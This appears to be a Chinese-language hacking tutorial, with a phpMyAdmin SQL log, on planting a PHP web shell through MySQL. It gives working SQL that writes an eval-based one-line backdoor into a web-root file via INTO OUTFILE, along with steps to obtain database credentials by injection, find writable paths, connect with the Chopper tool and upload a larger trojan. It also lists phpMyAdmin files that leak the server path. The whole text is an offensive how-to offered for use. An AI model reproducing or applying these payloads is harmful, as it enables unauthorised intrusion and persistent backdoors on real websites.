USE mysql;# MySQL 返回的查詢結果為空(即零行)。 # MySQL 返回的查詢結果為空(即零行)。 CREATE TABLE a( cmd1 text NOT NULL );# MySQL 返回的查詢結果為空(即零行)。 # MySQL 返回的查詢結果為空(即零行)。 INSERT INTO a( cmd1 ) VALUES ( '<?php eval($_POST[cmd]);?>' );# 影響列數: 1 # 影響列數: 1 SELECT cmd1 FROM a INTO OUTFILE '/data/www/heneng/cp/mm.php';# 影響列數: 1 # 影響列數: 1 DROP TABLE IF EXISTS a;# MySQL 返回的查詢結果為空(即零行)。 # MySQL 返回的查詢結果為空(即零行)。
1.首先通過注入獲取mysql數據庫的用戶名和密碼
2.通過相關渠道獲取mysql數據庫的路徑
3.使用用戶名和密碼登陸mysql
4.獲取網站可寫目錄的絕對路徑
5.點擊進入sql編輯器,輸入上述代碼,將一句話木馬寫入網站
6.使用菜刀連接一句話,上傳大馬
方法二:
使用phpmyadmin中的sql語句
寫文件:
select '<?php @eval($_POST[1])?>' into outfile '/data/www/heneng/cp/log.php'
最后的/cp/log.php的文件名可以任意起的,不是固定的。
利用mysql數據庫爆網站絕對路徑方法
使用phpmyadmin的某個文件報錯
phpmyadmin爆路徑方法 weburl+phpmyadmin/themes/darkblue_orange/layout.inc.php
phpMyAdmin/libraries/select_lang.lib.php
參考:360搜索“mysql寫入一句話木馬文件”